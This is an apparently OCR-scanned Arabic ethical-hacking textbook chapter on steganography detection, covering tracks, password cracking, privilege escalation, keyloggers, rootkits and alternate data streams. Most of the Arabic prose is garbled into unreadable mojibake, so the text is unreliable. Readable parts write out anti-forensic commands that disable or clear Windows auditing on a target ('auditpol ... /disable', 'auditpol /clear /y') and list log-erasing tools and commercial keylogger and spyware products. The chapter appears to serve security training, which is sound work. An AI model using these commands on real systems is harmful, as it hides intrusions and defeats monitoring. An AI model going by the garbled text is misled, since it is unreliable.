jjc. ^jj-d^jjoixJI j>» <jojLud^JI CjU» jIslxJI ^li^V .^11 'HTML t(j^51j t^i^i^)!! jjj^IIj cjL* jjuj^JI <JiL<» jii j.nx£]| cA ^ cjLLijI] 

SAl^xi L_u3LojI ( . lllaJJ <JU3l dlliLJl ^\ jj| .^ikjjuixJl diliLJl ^^ic bLucI (JjlaJ ^aJJ 4_lik-<Jl CjLLlJl jC C Aaj&II .<J ^ jj^axJl 

VI <JLujj3I ^ jj C5 ic jl j^j V <Lj]a3l c>'±& JIoj L_flL ^ <Lojj3! ^jj L^Ak. .4jq^ A\ JjLuijII jc- t L^l] 

Text Files ^ 

JaLajl jc laall J^lk j-o Cj^IjAxjII £>i& jc c Lj&H j^Jj .^-^-^ pU^V L_flj^Jl £jJa j-a ^^ic lIl^LAsu ^1} tAjj^aill dlliLJl ^ 

XL jUll CjULuiaII j* (^^Ic JAslSI j tlxiJl £^ajjl t^iklauJ! AjlIII j tdjUljiajJaVI j* l$\ jl (J-^Jl 

Image Files 

JjAsu ^kl 4(JjAsU ^kl ;L_aL» <J£ju1J A^^Ji e-l jjuj CjI jmMl ^-^j LS^^ 3 *Oj J ^^ LS* ^ <^5^l CjL» jLlaII jc ' j£*j 

.ciLJI j* jl jlVl C ! jllj 'yr 1 ^ fi^ 11 

^jialjlial jjuoc (Jal jl Aj^I JaVl jl /ojjj^II I^I^jjujI j^j ^U^^-Vl iJjlv^l l-uILojI 

LSBs jl ^^j^l j^ 'c^^j .U^ ^ s jj^ 5 ^^"j ^-^3 LSBs jl jl *j cr^^j s cS^f^ ^ > ^ 

t lfrLa£l J ojjj^II <J j^. CjU» jIslxJI j>i jj^li l^-jl ttilli j-d .^1 JJ^C dljujj] 

^j^aLiJI LSB t4_Jlc entropy ^jiAxJI CjULiJI ^ .<^l cJ^^ LSBs ^ 'Oj^ <J) ^-^j ^U^) ^ 

U£ j^ 6 LSB ^5^* 15^ 1 Jjlaall al iklLujl ; ,4_ij| jJaC JSI jl jj£I ^Aj ;Jj^aVI jc CjLg jlx-d ^jl^J V ^UasJU 

j^J AjjjlaJI ^J^lj jjuaslSI 

Detecting Audio and Video Steganography 

Audio File 4 

;aJU3I (jjUl aIa^IujLj I^jU^I ^^1 jll 

,Cj JJ^II L_flL» ^^Ic Uiajl LSB ^— A I laajujl ^aJJ dlla Cj JJ^II Cjl aLdl a laJL cJ jl Uiajl 1 g <Lj *^ - ^>^N/1 (Jjj^j]| <L^)]a 

,CljL<i jlstxi ^^Jc J jj^^J] 1 ^ > ^^>^ j^d ^ J^^> J^C. dib^jlill 

Video File - 

La) Jalill jJ^liill ^ AjlLk] ^aJJ dibllldVI j* ^ jj ^1 <— 1\ Ji CjULJI j* ^ jj ^1 jl AjjjoJI CjLg jIx-aII 6 jJ^iill CliLi jlx-ft *ta^J ^ 

jj^ill CjUL ^ <j>JI cjLLJI j& cA^ll jli tgJLilLj .image steganography J audio steganography ^1 j^l ^l^i^L 

djLUill jC c <j> : >i^^ I^qIa^LujI j^J djIc-Lajlj A > ^nl ^ ^l j£l .Ajj jj^II CllliLJl j ojjj^ll ^ ^Ld^JjauJl l_u3LojVI j-« ^-C j-<^<i j a > laJJ 

,4jJjaJl 

Steganography Detection Tool: Gargoyle Investigator Forensic Pro 

http://www.wetstonetech.com :j^^l 
£*l jJI j& di^ll cjVI jl jj*-a j^j^ ^sj^ ^-^h ^jLL^ ^j^j sbt ^ Gargoyle Investigator Forensic Pro 

4j^^)i3l CjliLJl ^15 L— laall 4)\*\C. jl i— li^ ^c^L^)Jl 5JIj) CIuj j] j (^^^ Ll^J ^g^c jjS«-!l j£-<uJl j^ _C1jIc. jloxJl j Ai j^x-<Jl 

'Trojans 'botnets ^ ^ 6 ^ 20 j* J&l ^ c^J 1 ^ (signature set) <y31jj cilLj . j^ ^Lj±> ^Lkii^ll 

^al^ki^L UjUjI <aj ^1 Stego ^ 6 U j^j Keyloggers 'encryption 'steganography 

J^l j^ iJja J ajIIj ^jIS jjj^II J^- 'h^ ^ 'S-Tools 'Weavwav 'Blindside 
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Steganography Detection Tools 

Cj jj^IIj jjj^I! Jlxi 4_Laijj]| ^kc.y\ (JjLujj 4_lik-<Jl CjL» jIslxJI S Axlai 1 j L_Lu£3L till ^ajujJ CjL* jlstxJl s-likl jc d fljud^ll lIjIj^I 

;diLa jIslaII e-lik] jc c ftjjj^ll CjIj^U 4_ajUs Jj LuSj . jj^iillj 

Xstegsecret available at http://stegsecret.sourceforge.net 
Stego Suite available at http://www.wetstonetech.com 
StegAlyzerAS available at http ://www. sarc-wv. com 
StegAlyzerRTS available at http://www.sarc-wv.com 
StegSpy available at http : / / www . spy-hunter. com 
StegAlyzerSS available at http ://www. sarc-wv.com 
StegMark SDK available at http://www.datamark.com.sg 
Steganography Studio available at http://sourceforge.net 
Steganographic Laboratory (VSL) available at http://vsl.sourceforge.net 
Stegdetect available at http : / /www .out gu ess. org 



COVERING TRACKS 5.7 



„ jj jj;^^ jl Ai^jjaixJI a£jjoJI Jl J jll CjVjI^<» jl <loijUui ^Uj! l&jLuijl ^31 f<N^ > J) j| dj| jL.ha3I ^j^?* 4j]a«j3 

? (Why Cover Tracks)^) jtu^t A^u ^1 £tfaJ I jUJ -4 

tdlliLJl £JJJ j 6 (JLonl! dj!>l^jaj j^-a .6^ j Jc <JJ^ ^jaui A-ilc t . la>J ^i^-all .djl jL.ua] I laxJ jll j tA-iSLjal dll j^l ^jjj 

J CjLl^JI t . ilaa] (jLoVI dibl^cl jniul ^Uaill Jxill tillLJl 4_njj <JjLojj13 La£ jj^l^ll 4_ia&VI ^JL j*I j& j^g-II CjULic j 

fi^lfl all jli 4 JUILj J^JI (J^liaV ^Uaill £ jl jll (J^ajS J ja» j fc*Ui AsU ciljJJ L_fl jjuj ^.l^all jU tliA lilfl .(Jj£Luia]| 

Jj J j^Jl (Jj^ i ^ S^tcl 4CjIjLuia3I L^i^. j\ £ al\ JaC. lij .L-Jj^illj J jj^a jll Jc JalLaJl J^.^i3l Jc. J^-^J ^*J^J 



,^t]| t^jjj^lVI ^^>^l ^^^-^j t^LiSj^-^l djLLud^J] 
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.Ail ujj£l ^jj (jl (j-o ^'-^ J »a 1$ all (jli (JJ^JI ^"'^ JT4^ 

I^VI (>« SJcLuiAj J^wJI dililaj uaP^Ull AjIaj aA.l$ al\ 

.ol jU-l uj^ Jl Jj—A, » J jijll J^a : SECEVENT.EVT (Security) 
JSi cUj V ^Vl .driver : S YSE VENT.E VT (system) 

:APPEVENT.EVT (applications) 

:OVERING TRACKS dtJL«ul» 

V t * < J'V ^ J£f*^ AjI CjI,!^.] oLSjVI (Jjxjoij <<^-^ * ^ (j-G djJj ^3 (Jj£j <Lala all Ua^Jl JjLujjj a!1 jLall cJ j^lt 

(jJLnJI jl£ li) li& cj^j cj^-^uJI <it£ j Jj^»1 rootkits ^cjVUJI o^xj ^ .^IkJI Cx^u^ JjAxj] s^LaiJI 

^1 Cj^UuoJI (> JaA9 *l j^Vl csSUS 3Jlj] CijIS lij tjffim^t ^ ^UjSVI CjUUxJ JiUajl S^&liS ^> jll J jJal 6 Jjil ^Uajll J^AjuiI jjJJ 

4_ikij3 ^^klaaj ^1 CjIj^VI c> ^j^xJI ^IUa . (original attributes)^^*£\ ajIL^s ^ s 6 ^HiJ L&La*j ^1 
> kl^ll (attribute) ^ ^ j ji*^ j c < -^ d 6L - S ^ ^jta .NT l)^*-^! AiisLLJI CjljLauJI 

(calculation)^ ^ * ^ ^ ^ .L_aLJI ^^ic jjq> : >iMI ^jjjIa l-jL ^ ci^^A 3 *\*\\ djUi jlx-^ ^JS lij L^c 

(Ways to Clear Online Tracks) Cj^S Oj' ^Ij^aJI Jj^ ^ 

Private browsing o^\-^\ ^i^ill 
History in the address field ^ ©j^' 
Disable stored history ^ oj j^ 2 lI^xj 
Delete private data ^UJI CjIjUJI 
Clear cookies on exit £ jj^^ ^ j^j^^ 
Clear cache on exit £ jj^ ^ jj j^sll s jSli ^jij 
Delete downloads cj^j j^Jl 
Disable password manager <^ J^xj 
Clear data in password manager SjIjJ ^ ^UUJI ^jii 

Delete saved sessions CjLuLJ! cJi^ 

Delete user JavaScript ^ v^ni^ t laU 
Set up multiple users u^ ^'^^ ^ 
Remove Most Recently Used (MRU) I ^ ^i . n^ t ^UiVl JS! - 
Clear Toolbar data from the browsers cj Ui^l*] ) q* cjI jjVi -Sajj^ cjUUj ^jij 

Turn off Autocomplete JU^VI cillij 
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In Windows 7 

o Click on the Start button, choose 
Control Panel Appearance and 
Personal Nation -> Taskbar and 
Start Menu 

t* Click the Start Menu tab, and then, 
under Privacy, clear the Store and 
display a list of recently opened 



programs check box 



From the Registry 
in Windows 8 

» HKCU\Software\Micrasoft\ 
Windows\CurrentVersion\ 
Explorer and then remove the 
key for "Recent Docs" 

t=p Delete all the values except 
"(Default)" 



\ 



Disabling Auditing: Auditpol 



http://technet.microsoft.com/en-us 
t^^JI ^Uaill (auditing) <jyaii3l <IU> j*(cmd) j^ljVt ^1 ikU Sj^SSI <jJ ^ill ^Ig^ll JjVl £jI j^aJI l>* j 

.( [network sniffer] 

cJ^> .(U^ -UajjjJI syslog jt) (event log)^^V( ^I^Vl l!^^ Windows auditing 

^ Ailjlkl JjUj ^ (Windows auditing) 

jjaij 3JU> 5i iajjaij j^ljl jkuj I^jIS l^l^kiual ^jSaj NT resource kit ^ c> * Auditpol.exe sbi 

.^jk ^ja* 2 (Windows auditing) fLkjll 

jl^aJI J] (TVw// Session) J* lU^ t^^ls <u£*j <>j . WINNT J-^ J) £^ <^W-^ ^ 

C:\> auditpol \\<ip address of target> 

jj (auditing)^^ jllkj jl jSaj <jl ^ .^U^ll aJUJI (auditing status)^^ < cJj^ liA 
C :\> auditpol \\<ip address of target) /disable 

CjIjjAj s-li^V U^** ^ .cJ^VI (j-a (^1 (J? ' ^ es-*^ Cj!>L^juJI dAiLa t alia a djl jjjxjII j>» ^jAslSU l_s jjuj ^I^^VI 

Asu 6<iac j-<i ^.I^jjVI -^>^j .auditpol.exe ^acLoiaj ^jjSajII (JaLxj t^^Lk^ll Jja j^ Ajjh) cjI jUldl l_lo£ <Ja^J 

.audit.exe :£bV! ^l^kiujU ^ j^i s ^ JjS^jII ^ ^ jj^ 
Audit policy c^^' (> 

.(Administrator) j^^^ ^ v^ .. i<^ Command Prompt j^ljVl ^iL ^ 
;^U3I j^VI ^> cilli j^ Audit policies ^ 

C:\> auditpol /get/category:* 
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Administrator Command Prompt 



- n y. 




i^JUl! a^UL J!^k &a t*Ui ^ij Audit policies c> c£' 
C:\> auditpol /set/category:"system","account logon" /success:enable /failure: enable 



Administrator: Command Prompt 



Directory Service Changes 
Mractory Service Replication 
Detailed Direct ory Service Replication 
Directory Service Recess 
Account Logon 

Kerberos Service Ticket Op^rationc 
Other Account Log;nn Fgents 
Herheros Authentication Service 
Credential Ualidat ion 



No Auditing 
Ma Auditing 
No Auditing 
Ho Auditing 

Mo Auditing 
Mo Auditing 
Mo Auditing 
Mo Auditing 



Z : Ml sersMldfi in is t rat or >aud it po 1 /set /catec|orv:"s Mstcn", "account losron* 
: enable /failure - enable 

rfie command was successfully executed. 
2 - nU sers\Adn in is t rat or > 



_ 



.[auditpol /clear /y] j*VI <> c*Ui ^ Audit policies c> <yj^ 



Covering Tracks Tool: CCleaner 

http://www.piriform.com :ja^a3I 

^Aj^aJ Jjj^alij jtjl c a]aJJj <La>lklLaix J^*Ji dlliLJl a}\ jLj till ^-gjoiJ .L_LllaJJ Sbl j 6<Jj^a j> <^\\\ i ^Uaill (jjjud^jl £>bl j& CCleaner 

£x» I^I^JjojV dljl!i3l (J^a^)l3l 4_^.Lal^ 
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)vering Tracks Tool: MRU-Blaster 



http ://www.bri ghtfort.com : j^iJI 
a jj£ j£ll j tAja^^ll CijjljVl djlaLa j t^Uaill C5 ic ^Ld^klaixJI ^jI jsW c fl-jSaiL t^ll ^jujj ^nlaj MRU-Blaster 

4_U£ CjU jk* till ja jjMRU 

g-al jJI ^ l^SjS CjULlJI U jjc. j "^uv^m^l cjI jLoiJI" t qjhvi jUU ^Ibu MRU-Blaster . ^-aUJI ^j^Vl 



MRU-Blaster is an application for Windows 
that a I lows you to clean the most recently 
used lists stored on your computer 

It a I lows you to dean out your temporary 
Internet Tiles and cookies 




Vin*^+ "Paean*" Folds- 1 (am 36 
Vmdw* Tacvt'hJdiMlim ■ JS 

tniiir*! MRU fcwn RKgri C'rr.M-jnid Misi-irry 

^ Mb Lmc JU u mi H ?cert Anzfcjbon 
m? riiirC -i^. Ni>* R#o«nti\ppbcjlwn 
si? Clud rput moji R ucert Appfcjtjon ■ Name 
«h N 5 TiiPrl rpiir Mnrl R PrPf* AfrVjirmn ■ 
%* ^i.rokfiM*d!jtfii*r( Cuuwu* -Rslbui FiHLtf. ■ Flti 
V m i-r-'irl'i TT^prrrirrt "nnsnh ■ Rrvnnl Fihl it* ■ Fir? 
«T Mit«uMflMv«y*P»rf Cynwh -n^wnl HteLm ■ Rc3 

^Ntacn(iM**ifltm*rt Con»kt -Riani Fit 1st ■ Flt4 

v" Vmtb^sE^iMief- ReeertDotaSlreom MRU ■ HAJN 

^ Winofr-iEcpgpjr - fl»cirJD«5Stwn MRU - 0 



r? no* on ijhrt t-it t-»n bn l«und en :h* i< 



MFAJ-Btui* p*-H-N" pa-.'^ rl=*-ingo rr^fffl srtiti ipik a mitt 

Co to n«no 





griora Iwm ri jrrtnq. ^jv ran hdt rkccl.od bcl> ■ .' ll dc ?i a-roz. 



^ - -rr- -H-l-rci rjpsUUHLS 


J vi cTDict U-ru U HU 1 Km: 




f7 Wnkmi l flMn.. ,, DdanMnU 


V -.v-'iido-,: C:r=inHn(J 


JJ 


Oinjfi TihJU-i Hwlny 


5F ^'niluro- FrilvTlRrti J- WT\\\?. 




P Hrowfi-UrrKe "Mecsrt" rofct^H- 


vy Jiido*/: -KsMrftoiirl^i 




k Wrriom UMlAMriNIIUi 


(V yjMUii Ll-ti&tHriqle MIIJ tow 




F Hnraril Hrscrll MHL Li 


W' "./l lll' i. IJ 1 1 ■ ! 






ST 0 mt'cPic J Lp~i2 




P Uoi4iF***w*aiflM unu item* 






I? IJhios^flJCwrtlWr.M^Lcgtri _tj 


~ ' "l.fl nifnN Jiii.JijinPnil lm 




f? fc^MlnH Ihjrii! fin MRU lure 


67 "w/nriDi^ frw^lf b-R is 





a ft — Hapbtif | 



^ ttp :// www. brtghtfort.i 



https://www.facebook.com/tibea2004 



485 



Track Covering Tools 

^ixl^ ^ tiL <j^aLk]| Ajj^a^JI CjL» jIslaII ^^-^ (Track covering tools) ^— il jLai>JI 4jla*j CjI j^I 

C5 ic djl j^Vl ^ L<ua j s- 5 j-<^ j^*-^ ci^W^ j tdj!^jaj t flAai t4j3j-<JI djliLJI tiljUjj ^jII Internet history 

Wipe available at http://privacvroot.com 

Tracks Eraser Pro available at http://www.acesoft.net 

BleachBit available at http://bleachbit.sourceforge.net 

Absoluteshield Internet Eraser Pro available at http://www.internet-track-eraser.com 

Clear My History available at http://www.hide-my-ip.com 

EvidenceEraser available at http://evidence-eraser-pro.en.softonic.com 

WinTools.net Professional available at http://www.wintools.net 

RealTime Cookie & Cache Cleaner (RtC3) available at http://www.kleinsoft.co.za 

AdvaHist Eraser available at http://advahist-eraser.software.informer.com 

Free Internet Window Washer available at http : //www. eusing. com 



PENETRATION TESTING 5.8 



Password Cracking 



(Identify password protected systems) ^ .ipiS : l SjkaJ! - 

(Perform a dictionary attack) <j-j^i2t ^jaA Lis :2 SjkaJI 

jjuo^II ^iilaj cJ^xjoij .(JJa ^Vim^l CjULuo^. AjJa 4 La nil ^jj (_^i3l j jJjuo^II J^nlaJ ^jjj j^lall c aL> Jj^^l (J^^A 3 ^* 
Ij^li ^j^J ^aJ lij . JjuJI 4_aK ^^ic ^jJ^J ^jjj ^dlill c aLa ^jl ^gisu t^Uaill J Jj> > >nl cill ^xujj ^lllajH ^jl^ lij .^cjllill j 

(Perform wire sniffing) (j mnVitt ^ (j^l :3 SjkaJ) 

(Perform a rule-based attack) ^IjS ^ ^tUt ^j^S) li2 :4 SjkaJ) . 

(Perform a syllable attack) jiaUl ^jaA LLj : 5 SjIaaJ) . 

(brute force attack) SjSl! ^j^a jd ^j^^ ^ .syllable ^j^a ^1 j^j (Jjjia 0^ jj^Ji <^ <!jU^» 

. (dictionary attack)o*j^ 
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(Perform a hybrid attack) C#M^ fJM^ h& :6 Sj^lit - 
(Perform a brute force attack) <u*£l*JI SjiJI f i42 :7 SjkaJ) 

# JjuJI Jc JjSi*-ll aJJ J^ a *^ ^ ^-^j^ cJ^ Jj^-^ tjl L ♦ 

(Perform a man-in-the-middle attack) ia^jJt J J^j i42 :8 SjIaaJI 

_CjUi jlx-<Jl ^I^^JjojV ^a^L^Jlj - *all ^JJJ JIj^jI dj| jjfl Jl (J jj^ jll Jc <J jj^^J] 4_ljL^x» 

(Perform password guessing) 0^12 Liu :9 SjkaJ) 

(Perform Trojans Spyware/Keyloggers) jj»jl£/u M < V ctejjS i»i2 :10 SjI^aJI 
(Perform Hash Injection Attack) CP* f j^* Li£ :11 SjkaJ) 

# a£jjuo3I JjI j-g ^ a > ^ ^i^jll (jjjl^Jl ^sl ^Viml j A-il^xJl <juol^Jl (jj^ <^l (JJJ^Jl 

(Perform a rainbow attack) j^j f j^* l»i2 :12 SjkaJI 

# jjuJI ^jjjIa Ujjoixi <jjjud^xJI t - \\ &\ g \\ Q^j^j ^illrainbow <Jj-^> ?\ i^Lm! 

(Perform a distributed network attack) ^ j^a lis :13 SjIaaJI 

(Perform pre-computed hashes) 15^** 4j jh^ < i! I <jil$Jt iifi :14 SjlaaJI 

(Perform dumpster diving) i«UiII J L-uiHII Li£ : 15 SjkaJ) - 

(Perform social engineering) ^Ul^V) i^li :16 SjkaJI 

(Perform shoulder surfing) o nniVitt * Ij^j :17 SjkaJl 
.shoulder surfing ^l^i^U jjj^^ ^ 



Privilege Escalation 





j\ dliJJJ Cilia j JjjjouJI ^ jlum AjI jLiLdl lla - ^ cJj^-^ ^ t^Uaill ( >1 al£ Jc ^1 g oil J 

tililc t . LaJ t^jljlkl j;'^ o tiljj ,^Uai3l ^j-d A i J i II CjU» jIslxJI ^L^jIujI <jl£^U jUlbj 4L_fl^Jl ^Uaill Jc <liiaJi l—Aja ^j;^ 

^jl£ lit La ^i^jll ,^Uai3l <J jll <J^J ^j-d l^ilc jj^^JI ^li Jjj-<JI ^I^jjojU <J j^^ll cJjt> > >n <J jL^. 6 jjuJI 

(unprivileged account) cj^jj^) cjLUaj cjU±aJl JjLiu JjU :2 SjkaJl 

'Offline NT Password Registry Editor 'Active@ Password Changer j^VI ^ > ^ CjIj^I ^l^ki^l 
'Elcomsoft System Recovery 'Windows Password Recovery Tool 'Windows Password Reset Kit 
CjI jbiJ J^ ^^i^i lJj^ cjI jjVi ^ 'Windows Password Recovery Bootdisk 'Trinity Rescue Kit 
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Executing Application 

lj laa] Ub^jq'n ClalLnJajH (J-^ju jLlkl Ale. tiL (j^aLkll ^Uaill (j-a -ja-vlU Cj| jj^^H 
ui^Jl ^UaUl ^k- CjIuu jjjill jtfllLa <\nn jiaall :1 S jkkJl 

.V ^al ^ jJl ^JJ^ 4^.1^a Igil (j-a -ja^lU ;<jj!La lijj L_fl^Jl ^Uaill dlLaij J^l a ^ SI ^ * CllIJJJ ^aJ lij La -ja-vMl 

ci^JI ^QaUl Key logging Sjlua^i) jl*| jjJIj 4jU^> jli^ ^n/n j^Ml :2 SjIa^Jl 

.V ^i Keylogging <Jt ^1 jjj ajUl^JI ^Ljj c_ ujjj lij La j^v^l 

.4_Laj-a 4jjj ^ (j^Li lil La aA^xa 

'Spytech SpyAgent j^>^ ClAjLulaJ ^I^JjujI .^jjILJI dAjjjJa ■ uJ <J^j ^a ^Uaill ^^Ic jl£ ^l,1^2jailj CIiijjj 4_IjL^a 

'Advanced Keylogger 'Powered Keylogger 'AH In One Keylogger 

spy ware ^l^ouil :5 Sj^l 

SoftActivity TS ^>^i^j1I ^I^JLuit .^Uaill ^^Sc ^ U.* <J^j ^a ^Uajll ^^ic s j-" h^jII i^LujIj cIujjj <Jj^ 

.£11 'SPYPhone GOLD 'Mobile Spy 'WebCam Recorder 'Spy Voice Recorder 'Monitor 

Hiding Files 



a\\ djULall t ajj&l] JjljikVI jfo * d ll jixk ^LjI ciiilc ( . v^j ^Uaill (^AaJl J jj^a jll C5 lc- Jila^i] TOOtkitS L - 1 f^ J (*J^ f>>^ A ^ 

rootkit ^2 :1 SjIaaJI 

(Perform integrity-based Detection techniques) ^lill <-ii£]( cjUjSj LiQ :2 SjkaJ) 

'cross-view-based detection ' signature-based detection 'integrity-based detection cjlij^l iiiiL ^ 

.rootkit c> ( heuristic detection techniques 
rootkits ^l^l-ul :3 SjkaJ) 

Op. lJl&I t*lli Uj ^Rootkit Buster 'Virus Removal Tool 'UnHackMe 'Stinger anti-rootkits 

.rootkits 

NTFS Alternate Data Streams (ADSs) f\*&l*\ :4 Sj^l - 
c> UiL^£! ^ jl alas j ^jiLJI ^Lkj ^ iSjjaJI Cj! jii^JI ^jLJ NTFS Alternate Data Streams (ADSs) ^l^i^l 

NTFS stream detectors?t-^«t :5 Sjkkil - 
.NTFS-ADS streams CP- <J^S1 t*Bi U j streams 'ADS spy 'StreamArmor NTFS stream detectors ^l^l^l 

# CjLLiJI "LjJ^J iali^J] <^ jll I^Ij^JjujIj Ajjlx. <!Lujj <JJjuo3I JjLojjII ^ILkV CjLa jlx-aJl CjLuflJ a I laJLujI 

CjLa jlx-aJl ^jc c ^l^klujl ;7 6 J^aaJl 

'Stego Suite 'Xstegsecret 'Gargoyle Investigator" Forensic Pro cjUjIx^I ^ c^ill CjIj^I ^l^ki^l 

.Steganalysis *bV ^ u j 'Stegdetect 
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Covering Tracks 



.history j 'temporary files 'cache ' j^t 'MRU ^ j^Vt 4^ ^ JaL&ll cj! jL^ 3JI jj ;V jl 

(audit) J^aSM :2 Sj^t - 
. AuditpolJ^ f\ ikUj tillij ^Uill <lj .l^i^ioij ^1 ^Uailt <jAtfil J^xj] ^ 

.log flooding jl log poisoning proxy log files 'server log files 'event log files J^Jl cjUL ^ a! jU^» 

'Clear My History 'Tracks Eraser Pro 'Wipe 'MRU-Blaster ' CCleanercS^ ^1 j^l ^ 
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